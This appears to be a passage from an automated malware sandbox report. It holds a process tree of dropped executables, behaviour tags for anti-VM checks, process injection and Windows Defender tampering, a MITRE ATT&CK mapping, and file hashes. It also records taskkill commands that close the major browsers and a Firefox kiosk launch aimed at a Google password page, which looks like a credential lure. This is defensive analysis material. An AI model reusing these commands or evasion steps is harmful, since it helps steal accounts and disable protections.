- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\10419730101\b2c8a4d481.exe"C:\Users\Admin\AppData\Local\Temp\10419730101\b2c8a4d481.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10419730101\b2c8a4d481.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2880
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419740101\141b76bc55.exe"C:\Users\Admin\AppData\Local\Temp\10419740101\141b76bc55.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10419740101\141b76bc55.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419750101\607d38be61.exe"C:\Users\Admin\AppData\Local\Temp\10419750101\607d38be61.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\10419760101\5e35cdfe6b.exe"C:\Users\Admin\AppData\Local\Temp\10419760101\5e35cdfe6b.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6052
-
-
C:\Users\Admin\AppData\Local\Temp\10419770101\4992f80afa.exe"C:\Users\Admin\AppData\Local\Temp\10419770101\4992f80afa.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:3116
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3780 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2028 -prefsLen 27099 -prefMapHandle 2032 -prefMapSize 270279 -ipcHandle 2108 -initialChannelId {15741c17-09d1-42f6-9d76-868b069a345a} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:2252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2516 -prefsLen 27135 -prefMapHandle 2520 -prefMapSize 270279 -ipcHandle 2528 -initialChannelId {440d09c1-23c3-4821-9084-f10544a72906} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:5572
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3824 -prefsLen 25164 -prefMapHandle 3828 -prefMapSize 270279 -jsInitHandle 3832 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {4b2ffb57-164f-4b57-84b2-42f66e05c97d} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:1808
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3984 -prefsLen 27276 -prefMapHandle 3988 -prefMapSize 270279 -ipcHandle 4072 -initialChannelId {e8bcce53-cb70-48e3-83d5-e8d5980e03f2} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:1764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1680 -prefsLen 34775 -prefMapHandle 3132 -prefMapSize 270279 -jsInitHandle 3188 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1332 -initialChannelId {61ff8638-ade8-4006-872e-544c7309f0e7} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:4092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2972 -prefsLen 34905 -prefMapHandle 5280 -prefMapSize 270279 -ipcHandle 5316 -initialChannelId {6b913266-83e9-49ec-a0f1-5d92103c93a3} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:3048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5524 -prefsLen 32845 -prefMapHandle 5540 -prefMapSize 270279 -jsInitHandle 5544 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5552 -initialChannelId {c00787cf-9220-4dd5-afbc-e133a9ef6275} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:4708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4564 -prefsLen 32845 -prefMapHandle 3216 -prefMapSize 270279 -jsInitHandle 4488 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3004 -initialChannelId {c818a787-c4f3-480e-a444-f3f5114f34bf} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:4476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5780 -prefsLen 32952 -prefMapHandle 5784 -prefMapSize 270279 -jsInitHandle 5788 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5796 -initialChannelId {ef7ac289-b613-4f2a-8774-4daa053a80b4} -parentPid 3780 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3780" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:2972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419780101\0f59d4b806.exe"C:\Users\Admin\AppData\Local\Temp\10419780101\0f59d4b806.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
C:\Users\Admin\AppData\Local\Temp\10419790101\756b939269.exe"C:\Users\Admin\AppData\Local\Temp\10419790101\756b939269.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5200 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2956
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419800101\ba60ba50d1.exe"C:\Users\Admin\AppData\Local\Temp\10419800101\ba60ba50d1.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1296
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4592
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3924
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD591f372706c6f741476ee0dac49693596
SHA18e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d
SHA2569a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781
SHA51288b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0o5pj305.default-release\activity-stream.discovery_stream.json
Filesize22KB
MD518936c10737d58eb395e8d6cd19dc2fb
SHA1ea1b71846b03c1b56d7337e3c16446c3ef23255c
SHA2564a250177353a0c48a1712b12d6eff2b347e5a6d129ee7fbc3657645135d8ca06
SHA5121a377181eda5004f24050a1fe44bbfe61137b377a349186c7fe3605e2d0a23a090f3159924251fc234cdc12e1ff582200c72e26229c473d923f7198052a9a4b9
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0o5pj305.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
Filesize13KB
MD5385ad731023417e4cf645df0e64107ca
SHA1a7bc1355648f410df3d71692cfb9f9896ce205df
SHA256920a4f4d9a8639be2cac781cca7666a1e6a1cd126f88f751b7670305ceabb4a5
SHA5122499f4fec9f792fd01af02bbb882188fd2f184e26a23f903d0750aa75b471bf0064bd89ce34a19b677f35ba46a5b444e94b63dcbcd8c468e844cbff1775324e6
-
Filesize
1.8MB
MD57b4c5fa52c698720d7d9e45ed2d7a711
SHA10242af88692e8fd8e1075a762ae13cf315385a6c
SHA256058476af0241212cf5ed6dd22bd2eba6ec72afea0364357fba9eb870f06c2368
SHA5122358ea5f1a59cbd7041872bb3ce349dda31a559d8a697cd20443bef825f33602b1b41123dd7cf37b6a1d7d9cac03fe17bb08be8651b30968e20b8a5e6c788327
-
Filesize
4.5MB
MD582a660623656c064fb7a7598ff283512
SHA19962f734b944a3c60879d590d974db4eb85a41c5
SHA256579aa629ade38640ab1fb3f8c9e7a1c172062d4740fc797456803db12415ca51
SHA512e08d0a106869753789e2212c2eef998b56a20baf0080ceb9112eb6fa01e6e92751850fa2ee5e3a261adc30514f7b76bf2585dd0de3f3774011d06565d861f157
-
Filesize
4.3MB
MD5d7d5b2f460ab2a552ccd37ffe846f39a
SHA1a84bd114c44827a07e29a548211c769bfda274c2
SHA2565a19f74e5205b970c5f36c0c466f2f888412e14bf7f95b22856c4a7739e64eb1
SHA512502e408d9fd0fc15bcc23b8f958a96cd8f26306513802f30e6ee0dda985ce409cbf99c7ff2385002d2de1be005317b8cb011cecd0989fed0da58c59e8b771b7f
-
Filesize
2.0MB
MD569688177ed1baa1e21ebf5b8cc5d416e
SHA1eba68df7434baadb9a536f6cd7d66ff113a42ffa
SHA256b59e061f2ea5a7f4cdd2a5edeead169998f9a9ee959e51386051f69a518a263c
SHA51255fd5ea2b5fcfe6fa6bf79d3fe6e5a5e44e85a487d7709e4e5e047716aa33a9c6360491fe2d781f459ebe3d7e204cfd5cc751fc0eb9a11435fac959111e3d6cd
-
Filesize
2.4MB
MD56bcaa6f066af78f85f1106de1ea00031
SHA14981bdc7125f2460afc0b514241c785736d71268
SHA25627613cc4f4a71db26084707ad958d9e8228e654e4ea575dd1c0dc7bbb92845cd
SHA5121364694219b2730de483b201586da626889e36d661aa4c53b96e10baa5ee47c04f00e1779dec01335938538272bcc77a905f626f1a2f1e3a964c3b3d6972a96b
-
Filesize
950KB
MD5dcfce6257bd41af54060a4429662d291
SHA1b14fda486f0dcc3167432666aea136ef962f66bc
SHA2561a3be077f95f1f86b8efae98b20b07d389225860d31027d1f0638841475f7612
SHA512d8e6dd08a65a340dec6aa30f29e45990393c36d65372811108e754fdb4decc6f959abbd15bcd4a0cc1eb013c7fe3d6bcf42cb8672f3cd2681f032244b31b2842
-
Filesize
1.6MB
MD55fc1c5eb9a034468541060c199beeb32
SHA1d5f39e29fc056e56d62984a759bc396928cdcfd5
SHA25625ccf0acdb6d0d78422a25b800472e22d3e6f00e1a7a58ef51bd53c364541650
SHA5120148bafd450034dffe559d278211f7b5951d064866c446818f8d0fabfe8b887ea06fc5c08958811dc55481d88ca81039cafae36ee4c0932aecc53b101a0aa410
-
Filesize
2.1MB
MD58b7a6718ca74360fe9f51999563d5bd4
SHA1bba0641bc9c1360d8df011c5ad99d648536fd2a2
SHA256bb27921192d981c37db53a0c53e5298d35b5bb219638c66eb1ee2d63ccd2096d
SHA5123b3fe72040fadbb15273e2bbf6ccdd02a2cf8c736d1d8dac3a5c006274ac9d31e3c44dc5f793afbc98696bd958714b48f8a5efe7e7f2f17a5ceb6b5d308392d0
-
Filesize
716KB
MD557a5e092cf652a8d2579752b0b683f9a
SHA16aad447f87ab12c73411dec5f34149034c3027fc
SHA25629054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34
SHA5125759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f
-
Filesize
358KB
MD5e604fe68e20a0540ee70bb4bd2d897d0
SHA100a4d755d8028dbe2867789898b1736f0b17b31c
SHA2566262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361
SHA512996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
717B
MD58957cea0f884148352370eb679456389
SHA1d53ed6464d76402ea3d1fc0c065c1f3667fa3af3
SHA256239cce21ad861ed5418e35ed943ded24a4ac69173038899bb670dd434ae6a022
SHA5121d9085ffb2ab8b5aa75a61a6bae1fb89686a83d6ca7d9ff8bae11b87b4faa2a162bbbab99d2231a3d068c18099bffe0ed2aebbecc33d00534624aae460cb0f41
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17
-
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
Filesize
502KB
MD5e690f995973164fe425f76589b1be2d9
SHA1e947c4dad203aab37a003194dddc7980c74fa712
SHA25687862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171
SHA51277991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2
-
Filesize
14.0MB
MD5bcceccab13375513a6e8ab48e7b63496
SHA163d8a68cf562424d3fc3be1297d83f8247e24142
SHA256a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9
SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\AlternateServices.bin
Filesize8KB
MD5dae87b07391dfb29521ed1dbac4a9f0c
SHA116546e0645c1f5c0cee79815f891d7f2b004f91c
SHA2561617c566a83da9d4662fa81bd5748cc99a504b95e6620c557db0fbc4584c7a02
SHA512353e2061d31e7ccb6bb6207871e8d3710b1e7ac568f6978bba00f173ca127cc2f650ed863fd37d59479e51bd91ec3d4adc190e7244d55ad81725d4522ee8078f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\AlternateServices.bin
Filesize17KB
MD5d73392f616d1eefb05004a88e4038a0a
SHA13a10dc514f23144cea59b84cb396da31bca862f2
SHA2569ad7405f0b0b6ff647bf8002e9471512cd6d5836646ef933110634475a070f9b
SHA5121f34423a7a1f8440d2e2837790f4879fc4a610d275241cc7da05c147fd15b1c266583ff717c2815a7db50722887779d4a8b64db2832df10ac301628797f3ec6a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\db\data.safe.tmp
Filesize3KB
MD53006c820cf637b9dc248bbe4028a2c15
SHA126d6cc59cf45892e58d3b2e6ab063ee204d60726
SHA256dd2430c3f1bb014ca0496a7c23f3734ced01eb43a27395226e816dc98cd51626
SHA512bf4f8874c1d13fe33b154e410650729150493e5662083e8fcec5c25e90aa9da985b091f1754cd9f318311013e7a5491e4a90b4b222fe254e4b847af54ca350c5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5330e8b46bcad9b8ab0862e4598efe057
SHA197b3ce8039240d619b2f31cb7285d002f48e7763
SHA256060c2c83539a4e7f2793ff77a097b03a437b95c115f7d56395eaedf1b7f4d6d1
SHA5122489b2efb840766767d62b35a38b5f481867a8a2d4b963869cedeb7daebab2d894b9e8293c87a7a8e1994a68ff2dba5a7174a85fef25db2fdd8f43b07d0276f6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\events\events
Filesize1KB
MD5c3e15fc5487d4edf0591e761cb307e2c
SHA13b66267a78e8383bb3b1bc6c4958fdcc316e4697
SHA256120a2231598d75796c9f7c96a5d01df68d986f81efd4b30d3a87c0329c844375
SHA512988853eb0239ba3bb6f6a8c05f02fa2b2ce92294672d85552a9ea99ca2fa6dad3018ee965b899d97a923b45905c9172eb338578e3cefb95c49e04079a50efea2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\pending_pings\24f84d99-aa29-4558-9b87-55b8f61a5a73
Filesize886B
MD5e76a15ceed7e3cfc3e36adde72f8eb24
SHA1ba006406a9ed37a27351ec9d071af16448943799
SHA256d5c47e909ebd2f49ef5480574683a4dc92c4cf9b17138ac71c8180aa34213c84
SHA51231398b949ccc2f42614d6876daa8a935b232730e08d6c6ea39229242cee19f27b309b16e137617cfb0967f57945a551d8a7f6357d98a42507a5aeea7552937ae
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\pending_pings\268ad632-c48c-4ade-8e67-080a5ac38cf2
Filesize2KB
MD5f7e8be1b3a83dd8ac437bbc20098ec0d
SHA150e3a1b4f415dd9aa926a8a7a754d7562c46cca7
SHA2568982e6bff78b641dc7620c787a7672019d06e452da7297213478c98f68254e8a
SHA51265fb8eb3e3d249391e56fba72cb9bd764c0d91a36ecadd6bce9d8b4534b21d4d527571a0edb9fe89d246b6fa6f3f5c7b46dda49f8664176b5aae398b1da847a8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\pending_pings\af6f7733-084c-4294-b3b4-5e670080fbd2
Filesize883B
MD5719163e7390f08f61c8b068badf43dbf
SHA1ddcaf7be3fad3360970790bbeb72f9c054985b86
SHA25690b3f702bd9ac17a9e2a74c320a10ce66fd77f246157c65576c4f722bb0e3b6e
SHA51200c84e42ab6d1779d4cef4b3fea68d69b01e6f1a2130d1ba0da5459a9dc6e4250780609fdb827ee1a2846d4b309616eb2a47bed7abbc8727c8f4678c8059860e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\pending_pings\d134829d-4d55-4df1-a6a6-2de3e4b280cb
Filesize235B
MD535df0696f16beebac704a01e9b3f2732
SHA1748055bf224a67987655e845859d06824cd29b79
SHA256558fa34c7cca488422ab2d1ed5199511140801048d48015a1084710cead9f2ba
SHA5122266cddc8412b4b16d433e000a0d966d9a89db012a01d705d499b3aa5cc8a2778133f6a1407bd6a09e77d988761d38a125773462373f00aa3d55a155396a1add
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\pending_pings\ead631cb-46f8-4645-b3d1-c812003359a8
Filesize235B
MD530e2868ca0c771a970f0d465686418bf
SHA128fdb1e1108b76831f890769774bf7944ced797b
SHA256fb99a49f473e2411d25f24ebc002f6fc47a8516abfa9d44320e937a90b306227
SHA512f4cd087598b2c0bf84d268182f1ead7921c85122eee18752823f69e5a025a6c7a57976a566f4afbe9185fa2bc8b3ea63ef15ad961d109b5743854254b7afab4b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\pending_pings\eebb9957-e305-421f-9945-56303968f9a9
Filesize16KB
MD569556b9b4bfcfbc80d22323aa9ad2047
SHA135a18709db4988fdbf6177816fc5ced3d5718688
SHA256ce6bbf8d76a23398f5be97ac773c101a96c2f9abaac165c8453a3b3582a9e942
SHA51296fe20f807c366732006f862865ac3a4649fb1db6269c4cb856034c3527c17a32b40386b698e98f2489b50f6d45dd6b38501a88e91ec9f0752f93614abe521b3
-
Filesize
16KB
MD52e086fb27b36810dd6a9457b5a71d9cb
SHA1d3f15859c874752db08573eb1c539ac16a1ee56d
SHA25669791befe285aa26142d95ce455742ba851257612953e87de4888cde4985b372
SHA5128ca599bd08ebcf3c9ba63461d2b4acf383704b3fbf7b6d6376af7af4b4f6524a188bf476bd20350db635aedaa9d911c7c0a2a95e9b8d930b60d2d676e84db786
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
6KB
MD5fce825a1f7626f8d0577b9941280422e
SHA14abb79567a1f145685f26dd98ea52989418d094b
SHA256626f736a3d833c052b216ea3884008ed3f7850d4f707b8ed95c48787c9a934b5
